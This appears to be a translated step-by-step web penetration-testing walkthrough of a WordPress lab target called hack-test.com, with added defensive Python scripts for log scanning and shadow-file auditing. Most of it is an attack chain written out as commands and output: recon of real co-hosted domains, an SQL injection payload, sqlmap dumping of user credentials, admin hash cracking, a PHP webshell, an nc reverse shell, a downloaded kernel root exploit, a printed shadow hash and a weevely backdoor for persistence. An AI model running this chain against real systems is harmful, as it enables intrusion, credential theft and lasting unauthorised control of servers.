Let's take a look at the target site: hack-test.com
First, ping the site to get the IP of the server it lives on:
Now we have the IP of the target site's server: 173.236.138.113
Next we can look for other sites hosted on the same IP (neighbouring virtual hosts; sameip.org):
Same IP 26 sites hosted on IP Address 173.236.138.113
ID | Domain | Site Link |
1 | hijackthisforum.com | hijackthisforum.com |
2 | sportforum.net | sportforum.net |
3 | freeonlinesudoku.net | freeonlinesudoku.net |
4 | cosplayhell.com | cosplayhell.com |
5 | videogamenews.org | videogamenews.org |
6 | gametour.com | gametour.com |
7 | qualitypetsitting.net | qualitypetsitting.net |
8 | brendanichols.com | brendanichols.com |
9 | 8ez.com | 8ez.com |
10 | hack-test.com | hack-test.com |
11 | kisax.com | kisax.com |
12 | paisans.com | paisans.com |
13 | mghz.com | mghz.com |
14 | debateful.com | debateful.com |
15 | jazzygoodtimes.com | jazzygoodtimes.com |
16 | fruny.com | fruny.com |
17 | vbum.com | vbum.com |
18 | wuckie.com | wuckie.com |
19 | force5inc.com | force5inc.com |
20 | virushero.com | virushero.com |
21 | twincitiesbusinesspeernetwork.com | twincitiesbusinesspeernetwork.com |
22 | jennieko.com | jennieko.com |
23 | davereedy.com | davereedy.com |
24 | joygarrido.com | joygarrido.com |
25 | prismapp.com | prismapp.com |
26 | utiligolf.com | utiligolf.com |
In total, 26 sites are hosted on the server [173.236.138.113]. To break into a target site, many attackers also bring the other sites on the same server into scope. For learning purposes, though, we'll set the other sites aside today.
We need more information about the target site (the author's note: in a penetration test, this phase matters far more than the actual testing). That includes:
1. DNS records (A, NS, TXT, MX)
2. Web server type (IIS, Apache, Tomcat)
3. Domain registrant information (the company holding the domain, etc.)
4. The name, phone number, e-mail address and postal address of the site's administrator (or related staff)
5. The scripting languages the site supports (PHP, ASP, JSP, ASP.NET, CFM)
6. The site's operating system (UNIX, Linux, Windows, Solaris)
7. The ports the site has open
Let's start by looking up the DNS records, here with who.is:
DNS records for the target site:
Record | Type | TTL | Priority | Content |
hack-test.com | A | 4 hours | | 173.236.138.113 |
hack-test.com | SOA | 4 hours | | ns1.dreamhost.com. hostmaster.dreamhost.com. 2011032301 15283 1800 1814400 14400 |
hack-test.com | NS | 4 hours | | ns1.dreamhost.com |
hack-test.com | NS | 4 hours | | ns3.dreamhost.com |
hack-test.com | NS | 4 hours | | ns2.dreamhost.com |
www.hack-test.com | A | 4 hours | | 173.236.138.113 |
At the same time, confirm the web server type:
It is obviously Apache; we'll pin down the exact version later:
HACK-TEST.COM SITE INFORMATION
IP: 173.236.138.113
Website Status: active
Server Type: Apache
Alexa Trend/Rank: 1 Month: 3,213,968; 3 Month: 2,161,753
Page Views per Visit: 1 Month: 2.0; 3 Month: 3.7
Now it's time to look up the site's owner (who may well be the administrator):
Now that we have some information on the administrator, bring out WhatWeb from BackTrack 5 to confirm the operating system and web server version:
We now know that the target site runs WordPress, the very well-known open-source blog platform written in PHP, that the server runs the Fedora Linux distribution, and that the Apache version is 2.2.15. Next, let's see which ports the server has open:
Bring out Nmap.
1 - Enumerate the services the target server exposes
root@bt:/# nmap -sV hack-test.com

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:39 EET
Nmap scan report for hack-test.com (192.168.1.2)
Host is up (0.0013s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
22/tcp closed ssh
80/tcp open   http    Apache httpd 2.2.15 ((Fedora))
MAC Address: 00:0C:29:01:8A:4D (VMware)
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds
2 - Identify the target server's operating system
root@bt:/# nmap -O hack-test.com

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:40 EET
Nmap scan report for hack-test.com (192.168.1.2)
Host is up (0.00079s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE
22/tcp closed ssh
80/tcp open   http
MAC Address: 00:0C:29:01:8A:4D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.22 (Fedora Core 6)
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds
Uh oh! Only port 80 is open, and it's Fedora Core 6 Linux with kernel version 2.6.22.
We have now gathered a lot of important information about the target. Let's scan it for vulnerabilities (SQL injection, blind SQL injection, LFI, RFI, XSS, CSRF, and so on).
Let's try nikto.pl first; it may well turn up a few vulnerabilities.
root@bt:/pentest/web/nikto# perl nikto.pl -h http://hack-test.com
- Nikto v2.1.4
—————————————————————————
+ Target IP: 192.168.1.2
+ Target Hostname: hack-test.com
+ Target Port: 80
+ Start Time: 2011-12-29 06:50:03
—————————————————————————
+ Server: Apache/2.2.15 (Fedora)
+ ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6448 items checked: 1 error(s) and 6 item(s) reported on remote host
+ End Time: 2011-12-29 06:50:37 (34 seconds)
—————————————————————————
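From the defender's side, the Nmap and Nikto runs above leave recognisable traces in the web server's access log: a scanner User-Agent, a TRACE request (the XST finding) and a probe for Apache's default /icons/README. The following Python script is an added example written for this page, not part of the original article or of Nikto; it parses constructed Apache combined-log lines (embedded inline, not real traffic) and flags the client IPs that show those traces. The log lines, IPs and User-Agent strings are constructed for illustration.

```python
import re
from collections import OrderedDict

# Constructed Apache combined-log lines (not taken from the page). The first three
# mirror the Nikto findings above: scanner User-Agent, TRACE enabled, /icons/README
# probe; the last two show an ordinary visitor followed by an sqlmap-style request.
SAMPLE_LOG = """\
192.168.1.50 - - [29/Dec/2011:06:50:03 +0200] "GET / HTTP/1.1" 200 1475 "-" "Mozilla/5.00 (Nikto/2.1.4) (Evasions:None) (Test:000001)"
192.168.1.50 - - [29/Dec/2011:06:50:05 +0200] "TRACE / HTTP/1.1" 200 312 "-" "Mozilla/5.00 (Nikto/2.1.4) (Evasions:None) (Test:000118)"
192.168.1.50 - - [29/Dec/2011:06:50:09 +0200] "GET /icons/README HTTP/1.1" 200 5108 "-" "Mozilla/5.00 (Nikto/2.1.4) (Evasions:None) (Test:003092)"
10.0.0.7 - - [29/Dec/2011:07:12:44 +0200] "GET /Hackademic_RTB1/?cat=1 HTTP/1.1" 200 8821 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/8.0"
10.0.0.7 - - [29/Dec/2011:07:13:01 +0200] "GET /Hackademic_RTB1/?cat=1%27 HTTP/1.1" 500 0 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
"""

# One regex for the combined log format; named groups keep the fields readable.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

SCANNER_UA = re.compile(r'nikto|sqlmap|w3af', re.IGNORECASE)
UNSAFE_METHODS = {"TRACE", "TRACK"}        # should be disabled (Apache: TraceEnable off)
DEFAULT_FILE_PROBES = ("/icons/README",)   # default files Nikto checks for


def parse_line(line):
    """Parse one combined-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(entry):
    """Return the reasons an entry looks like scanner activity (empty list if none)."""
    reasons = []
    if SCANNER_UA.search(entry["ua"]):
        reasons.append("scanner user-agent")
    if entry["method"] in UNSAFE_METHODS:
        reasons.append(f"{entry['method']} method")
    if entry["path"].split("?")[0] in DEFAULT_FILE_PROBES:
        reasons.append("default-file probe")
    return reasons


def analyze_log(log_text):
    """Map each client IP to the distinct reasons it was flagged, in first-seen order."""
    flagged = OrderedDict()
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        for reason in classify(entry):
            flagged.setdefault(entry["ip"], [])
            if reason not in flagged[entry["ip"]]:
                flagged[entry["ip"]].append(reason)
    return dict(flagged)


if __name__ == "__main__":
    for ip, reasons in analyze_log(SAMPLE_LOG).items():
        print(f"{ip}: {', '.join(reasons)}")
```

Run against a real access log by passing its contents to analyze_log. The User-Agent match is the cheapest signal and the easiest for a scanner to change, so the method and path checks matter more; the two Nikto findings they correspond to are fixed on the server with TraceEnable off and Options -Indexes (plus removing or denying the default /icons/ content).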
同時(shí)試試Wa3f(Ps:哦哇譜死的開源項(xiàng)目,很不錯(cuò)的說~)
root@bt:/pentest/web/w3af# ./w3af_gui Starting w3af, running on:Python version:2.6.5 (r265:79063, Apr 16 2010, 13:57:41)[GCC 4.4.3]GTK version: 2.20.1PyGTK version: 2.17.0 w3af - Web Application Attack and Audit FrameworkVersion: 1.2Revision: 4605Author: Andres Riancho and the w3af team.
It scans from a graphical interface: just enter the URL.
To put it the way I used to when writing for magazines: by the time you've brewed a cup of tea, the scan is finished and you can review the results.
You can see plenty of vulnerability findings. Let's try SQL injection first.
URL: http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220, then Exploit it!
The other vulnerability tests failed, so use sqlmap to dump the database (enumerate the database and save the target site's data locally). Dump it!
sqlmap -u url
After a short while you'll see the following:
Press n and Enter, and you'll see:
Oh yeah: an error-based injection point, and it leaks the MySQL version too.
Use sqlmap to list all databases, option --dbs
Three databases found.
List all tables in the WordPress database, options -D wordpress --tables
Then the column names (here you need to know yourself which table holds the sensitive data), options -T wp_users --columns
22 fields (columns).
Then dump the data, options -C user_login,user_pass --dump
Then crack the administrator's hash; here I used http://www.onlinehashcrack.com/free-hash-reverse.php
The plaintext password is q1w2e3 (right up there with the most common passwords in the CSDN leak, ha), so log in to the admin panel and go for a webshell.
Get in!
Let's upload a PHP webshell; here I used the plugin-editor method to get a shell (see the tips I wrote earlier; there are plenty of ways).
Awesome. Just save it, then browse to it and you'll see the lovely webshell.
As every hacker knows, the next step is privilege escalation. Use a reverse shell to get an interactive shell.
Listen locally with nc (a classic is a classic).
Once connected,
type a few Linux commands to test the waters:
id
uid=48(apache) gid=489(apache) groups=489(apache)
pwd
/var/www/html/Hackademic_RTB1/wp-content/plugins
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
I won't translate what the commands do. With the kernel version in hand, we can search exploit-db.com for a matching exploit to escalate privileges.
The original author downloads it with wget; what do hackers back home use?
wget http://www.exploit-db.com/download/15285 -O roro.c
--2011-12-28 00:48:01--  http://www.exploit-db.com/download/15285
Resolving www.exploit-db.com... 199.27.135.111, 199.27.134.111
Connecting to www.exploit-db.com|199.27.135.111|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.exploit-db.com/download/15285/ [following]
--2011-12-28 00:48:02--  http://www.exploit-db.com/download/15285/
Connecting to www.exploit-db.com|199.27.135.111|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7154 (7.0K) [application/txt]
Saving to: `roro.c'

     0K ......                                                100% 29.7K=0.2s
I won't paste the code. Compile the exploit with gcc (gcc roro.c -o roro), then run it.
./roro
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xe09f0b20
[+] Resolved rds_ioctl to 0xe09db06a
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
Stay calm, type id, and you'll find: root it!
Now we can read shadow and passwd (I only captured part of it):
cat /etc/shadow
root:$6$4l1OVmLPSV28eVCT$FqycC5mozZ8mqiqgfudLsHUk7R1EMU/FXw3pOcOb39LXekt9VY6HyGkXcLEO.ab9F9t7BqTdxSJvCcy.iYlcp0:14981:0:99999:7:::
We could use John the Ripper to crack the hash, but we won't. Usually we'd leave a backdoor instead (to consolidate access), so we can deface the homepage whenever we like (just a joke).
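The shadow entry above is the kind of thing an administrator should be auditing before an intruder reads it: which hash algorithm each account uses, which accounts are locked or have an empty password field, and whether the file is readable by anyone but root. The Python script below is an added example for this page, not part of the original article; it runs over constructed shadow-style lines with placeholder hash bodies (no real credentials) and reports per-account findings, and it checks a file mode the same way it would check /etc/shadow.

```python
import os
import stat

# Constructed /etc/shadow-style lines with placeholder hash bodies (no real
# credentials). Field layout: name:hash:lastchg:min:max:warn:inactive:expire:
SAMPLE_SHADOW = """\
root:$6$saltsalt$PLACEHOLDERHASHBODYxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:14981:0:99999:7:::
bin:*:14981:0:99999:7:::
apache:!!:14981:0:99999:7:::
legacy:$1$saltsalt$PLACEHOLDERHASHBODYxxx:14000:0:99999:7:::
olduser:PLACEHOLDER13:13000:0:99999:7:::
guest::14981:0:99999:7:::
"""

# crypt(3) prefix -> (algorithm name, acceptable today?)
HASH_PREFIXES = {
    "$1$": ("md5crypt", False),
    "$2a$": ("bcrypt", True), "$2b$": ("bcrypt", True), "$2y$": ("bcrypt", True),
    "$5$": ("sha256crypt", True),
    "$6$": ("sha512crypt", True),
    "$y$": ("yescrypt", True),
}


def parse_shadow_line(line):
    """Split one shadow line; only the account name and password field are needed here."""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 2 or not fields[0]:
        return None
    return {"name": fields[0], "hash": fields[1]}


def findings_for(hash_field):
    """Classify one password field; an empty list means nothing to report."""
    if hash_field == "":
        return ["empty password field: login without a password"]
    if hash_field.startswith(("!", "*")):
        return ["locked: no usable hash"]
    for prefix, (algo, acceptable) in HASH_PREFIXES.items():
        if hash_field.startswith(prefix):
            return [] if acceptable else [f"weak hash: {algo}"]
    if "$" not in hash_field and len(hash_field) == 13:
        return ["weak hash: legacy DES crypt"]
    return ["unknown hash format"]


def audit_shadow(text):
    """Map each account name to its list of findings."""
    report = {}
    for line in text.splitlines():
        entry = parse_shadow_line(line)
        if entry:
            report[entry["name"]] = findings_for(entry["hash"])
    return report


def mode_is_safe(mode):
    """shadow must carry no group or other permission bits (0600 or 0000 are fine)."""
    return mode & (stat.S_IRWXG | stat.S_IRWXO) == 0


def check_file_mode(path="/etc/shadow"):
    """Apply the mode check to a real file; needs privileges to stat /etc/shadow."""
    return mode_is_safe(os.stat(path).st_mode)


if __name__ == "__main__":
    for name, findings in audit_shadow(SAMPLE_SHADOW).items():
        print(f"{name}: {'; '.join(findings) or 'ok'}")
    print("0600 safe:", mode_is_safe(0o600), "| 0644 safe:", mode_is_safe(0o644))
```

The acceptable/weak split in HASH_PREFIXES is this example's own judgement (md5crypt and DES crypt are fast to brute-force; sha512crypt as seen on the page, bcrypt and yescrypt are not) and can be tightened to local policy. Note that a strong algorithm does not rescue a password like q1w2e3; the hash audit and a password-quality policy are separate controls.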
We'll use weevely from BT5 to upload a password-protected PHP webshell.
1 - weevely's options
root@bt:/pentest/backdoors/web/weevely# ./main.py

Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

Usage: main.py [options]

Options:
  -h, --help            show this help message and exit
  -g, --generate        Generate backdoor crypted code, requires -o and -p .
  -o OUTPUT, --output=OUTPUT
                        Output filename for generated backdoor .
  -c COMMAND, --command=COMMAND
                        Execute a single command and exit, requires -u and -p.
  -t, --terminal        Start a terminal-like session, requires -u and -p .
  -C CLUSTER, --cluster=CLUSTER
                        Start in cluster mode reading items from the given
                        file, in the form 'label,url,password' where label is
                        optional.
  -p PASSWORD, --password=PASSWORD
                        Password of the encrypted backdoor .
  -u URL, --url=URL     Remote backdoor URL .
2 - Use it to create a PHP webshell
root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p koko

Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

+ Backdoor file 'hax.php' created with password 'koko'.
3 - Upload it
Now we can connect to it with weevely and control the server through it.
Test it (it's essentially the same as a one-liner PHP shell).
Summary:
The original author writes well: a solid penetration-testing workflow and a very standard introductory article.